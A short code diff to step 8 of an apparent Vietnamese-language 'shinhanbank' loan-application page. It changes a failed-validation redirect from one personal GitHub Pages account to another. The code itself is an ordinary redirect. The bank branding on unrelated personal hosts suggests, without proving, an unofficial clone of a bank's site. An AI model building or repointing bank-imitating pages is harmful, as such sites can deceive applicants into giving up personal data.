--- a/pages/vi/step8.html
+++ b/pages/vi/step8.html
@@ -354,7 +354,7 @@ const CompletionApp = {
     init() {
         this.cacheDOMElements();
         if (!this.loadAndValidateData()) {
-            window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/step1.html';
+            window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/step1.html';
             return;
         }
         
